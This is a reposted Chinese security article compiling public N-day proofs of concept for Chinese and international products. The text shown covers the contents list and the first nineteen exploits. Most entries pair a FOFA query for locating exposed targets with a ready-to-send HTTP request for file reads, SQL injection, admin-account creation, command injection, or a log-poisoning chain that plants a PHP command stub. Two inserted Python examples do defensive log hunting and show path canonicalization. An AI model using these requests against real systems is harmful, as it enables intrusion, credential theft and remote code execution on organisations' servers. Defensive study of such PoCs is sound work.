Internet Public Vulnerability Compilation, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities makes up a large share of real-world attacks, so this article is meant to help the defensive side. Defenders can use the list below to check their own exposure.

Sources: the article collects 203 PoCs for high-impact vulnerabilities published in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Patches: every vulnerability listed is already public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few very long PoCs are replaced with the word PAYLOAD; search for the full PoC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the complete version; just search this page for the keyword you need.

Bookmark it if it is useful, or follow the public account (网络安全新视界).

Table of Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8 Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPtech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 apparel management system UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. 安恒 (DBAppSecurity) 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 (cloud mall) file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass (template injection)
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully automated parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值管理系统 DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point Security Gateway arbitrary file read
174. 金和 (Jinher) OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection (duplicate of item 158)
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical image viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) all-media news gathering and editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC List

02
1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"

GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"

GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 hash of the password you want the new account to have.

POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"

GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"

Log in to the admin interface with the default account admin, then send the request below. The stok value in the path is the session token issued at login; the sysauth cookie comes from the same login. The %s values are placeholders left over from the original PoC template; the injected command is the "; id;" appended to the wifiRebootrange field.

POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained in the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"

GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double-URL-encoded form of the following statement (an error-based probe that leaks the result of user() through an XPath error):

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
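The point of this list for a defender is to turn the requests above into something that can be run over access logs. The script below is an added example (not code from the article or from any of the products listed): it hunts an Apache combined-format log for the file-read probes in items 2, 6 and 7 and the SQL injection probe in item 9. It decodes repeatedly, because item 9 double-URL-encodes its payload, and it compares parameter values only after path normalization, because /etc/./passwd (item 6) must be treated the same as /etc/passwd. The endpoint prefixes come from the PoCs; SAMPLE_LOG and SENSITIVE_MARKERS are constructed for the demonstration.

```python
"""Hunt a web-server access log for the file-read and SQLi probes shown in items 2, 6, 7 and 9.

Added example, not code from the original article or from any of the products it lists.
The endpoint prefixes come from the PoCs above; SAMPLE_LOG and SENSITIVE_MARKERS are
constructed for this demonstration.
"""
import posixpath
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

# (label, path prefix) pairs lifted from the PoCs. Extend from your own asset inventory.
KNOWN_ENDPOINTS = [
    ("Casdoor /static file read (item 2)", "/static/"),
    ("Sangfor NGAF loadfile.php (item 6)", "/svpn_html/loadfile.php"),
    ("鸿运 MobileAction_downLoad.action (item 7)", "/808gps/MobileAction_downLoad.action"),
    ("Doccms search keyword (item 9)", "/search/index.php"),
]
# Targets the PoCs read, compared against the *normalized* parameter value (constructed list).
SENSITIVE_MARKERS = ("/etc/passwd", "/etc/shadow", "win.ini", "jdbc.properties", "web-inf/")
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
SQLI_ERROR_BASED = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def deep_unquote(value, rounds=3):
    """Strip up to `rounds` layers of URL encoding; item 9 double-encodes its payload."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(log_line):
    """Return a list of (category, detail) findings for one combined-log-format line."""
    match = REQUEST_LINE.search(log_line)
    if not match:
        return []
    parts = urlsplit(match.group("target"))
    path = deep_unquote(parts.path)
    findings = []
    for label, prefix in KNOWN_ENDPOINTS:
        if path.startswith(prefix):
            findings.append(("known_endpoint", label))
    # Test the path for '..' segments *before* normalizing; normalization would erase the evidence.
    if TRAVERSAL.search(path):
        findings.append(("traversal", path))
    for key, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = deep_unquote(raw)
        # /etc/./passwd (item 6) and /x/../etc/passwd both normalize to /etc/passwd.
        normalized = posixpath.normpath(value).lower()
        if TRAVERSAL.search(value) or any(m in normalized for m in SENSITIVE_MARKERS):
            findings.append(("file_read", f"{key}={value}"))
        if SQLI_ERROR_BASED.search(value):
            findings.append(("sqli_error_based", f"{key}={value}"))
    return findings


def hunt(lines):
    """Map line index -> findings for every line that triggered at least one rule."""
    return {i: found for i, line in enumerate(lines) if (found := classify(line))}


DOCCMS_PAYLOAD = "' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#"
SAMPLE_LOG = [  # constructed Apache combined-format lines modelled on items 2, 6, 7 and 9
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1480',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1" 200 1480',
    '203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1" 200 612',
    '203.0.113.7 - - [10/Oct/2023:13:55:48 +0000] "GET /search/index.php?keyword='
    + quote(quote(DOCCMS_PAYLOAD, safe=""), safe="") + ' HTTP/1.1" 500 0',
    '198.51.100.2 - - [10/Oct/2023:13:56:00 +0000] "GET /index.html HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for index, found in hunt(SAMPLE_LOG).items():
        print(index, found)
```

Matching on the raw path and on the normalized parameter value are deliberately separate: a traversal in the URI path is evidence in itself and must be flagged before any normalization, while a parameter value is only interesting for what it resolves to. Feed the real log through hunt() and pivot on the source address of every flagged line.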
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

The response to the upload contains the path of the uploaded file.

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"

The recordid parameter is injectable; the probe below forces an MSSQL conversion error that echoes @@version.

GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"

Step 1: fetch the login page to obtain the session cookies.

GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is reused in the following requests:

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST a login attempt. The language parameter is a path traversal into application/logs, so the submitted login value, a PHP stub that runs whatever base64-encoded command arrives in the K1SYJPMHLU4Z request header, is written into that day's log file.

POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: request the poisoned log through the page viewer, which executes the stub. The K1SYJPMHLU4Z header carries the command base64-encoded; ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= decodes to echo ---------;id 2>&1;echo ---------; so the id output appears between the two separator lines in the response.

GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"

GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"

The response leaks user names and passwords. The ";.ico" suffix is a matrix parameter that satisfies the static-resource exemption in the login check while the request still routes to getAllList.

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"

The response leaks user names and passwords. This is the same endpoint as item 14, reached through a traversal segment ("a.ico/../") instead of a matrix parameter.

GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

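Items 14 and 15 are two faces of one bug class: an interceptor that exempts "static assets" from authentication by inspecting the raw request URI, while the servlet container routes on the decoded, normalized path. The code below is an added example, not jshERP's code; naive_is_static is a constructed model of that pattern (an assumption about how the exemption is typically written, not a transcription of the real interceptor), and the hardened functions show the checks that close both bypasses: decode first, strip matrix parameters from every segment, collapse dot segments, and only then look at the final extension.

```python
"""Why items 14 and 15 get past the login check: an interceptor that decides "static asset, skip
auth" by looking at the raw request URI can be fooled with a matrix parameter (';.ico') or a
traversal segment ('a.ico/../'), because the container routes on the decoded, normalized path
while the interceptor sees the raw string.

Added example, not jshERP's code. naive_is_static is a constructed model of that class of bug
(an assumption about the pattern, not a transcription of the real interceptor); the hardened
version shows the checks that close both bypasses.
"""
import posixpath
import re
from urllib.parse import unquote

STATIC_SUFFIXES = (".ico", ".css", ".js", ".png", ".gif", ".jpg")


def naive_is_static(raw_uri):
    """Model of the weak check: any static suffix anywhere in the raw URI skips authentication."""
    return any(suffix in raw_uri for suffix in STATIC_SUFFIXES)


def canonical_path(raw_uri):
    """Decode, drop matrix parameters from every segment, collapse '.' and '..', squeeze slashes."""
    path = unquote(raw_uri.split("?", 1)[0])           # %3B.ico and %2e%2e must not survive decoding
    path = re.sub(r"/+", "/", path)                     # '//' would keep a second root in normpath
    segments = [segment.split(";", 1)[0] for segment in path.split("/")]
    canonical = posixpath.normpath("/".join(segments))
    if not canonical.startswith("/"):
        canonical = "/" + canonical
    return canonical


def hardened_is_static(raw_uri):
    """Decide on the canonical path, and only on its final extension."""
    return canonical_path(raw_uri).endswith(STATIC_SUFFIXES)


def authorize(raw_uri, authenticated, is_static=hardened_is_static):
    """Deny by default: only a genuine static asset or an authenticated caller gets through."""
    return bool(authenticated) or is_static(raw_uri)


BYPASSES = (  # the two URIs from items 14 and 15
    "/jshERP-boot/user/getAllList;.ico",
    "/jshERP-boot/user/a.ico/../getAllList",
)

if __name__ == "__main__":
    for uri in BYPASSES:
        print(uri, "naive:", authorize(uri, False, naive_is_static),
              "hardened:", authorize(uri, False), "->", canonical_path(uri))
```

The safer design is to not classify URIs in the interceptor at all: serve static assets from a dedicated handler or path prefix and apply authentication to everything else, so there is no string comparison to get wrong.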
16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"

The probe uses MSSQL HASHBYTES to compute the MD5 of 1234 inside the sort expression; decoded, the sorts parameter is [{"Field":"1-CONVERT(VARCHAR(32), HASHBYTES('MD5', '1234'), 2);"}].

GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua (大华) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"

The netMarkings element of the deleteBulletin SOAP operation is injectable; the updatexml() probe below leaks md5(102103122) through an XPath error.

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"

GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"

GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"

